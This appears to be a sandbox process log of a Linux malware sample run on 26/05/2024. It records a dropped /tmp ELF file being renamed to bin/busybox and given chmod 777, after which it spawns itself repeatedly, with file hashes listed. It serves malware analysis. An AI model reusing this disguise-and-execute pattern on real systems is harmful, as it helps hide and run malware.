                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/bin/sh
                          Arguments:-
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/usr/bin/mkdir
                          Arguments:mkdir bin
                          File size:88408 bytes
                          MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/bin/sh
                          Arguments:-
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/usr/bin/mv
                          Arguments:mv /tmp/cN7jzEkjeq.elf bin/busybox
                          File size:149888 bytes
                          MD5 hash:504f0590fa482d4da070a702260e3716

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/bin/sh
                          Arguments:-
                          File size:129816 bytes
                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/usr/bin/chmod
                          Arguments:chmod 777 \\xff\\xf0\\xfb\\xffbin/busybox\\xc8\\xfb\\xff\\xe8\\xfb\\xff\\xfc\\xff\\xb8\\xb0A
                          File size:63864 bytes
                          MD5 hash:739483b900c045ae1374d6f53a86a279

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9
                          Start time (UTC):09:00:53
                          Start date (UTC):26/05/2024
                          Path:/tmp/cN7jzEkjeq.elf
                          Arguments:-
                          File size:4139976 bytes
                          MD5 hash:8943e5f8f8c280467b4472c15ae93ba9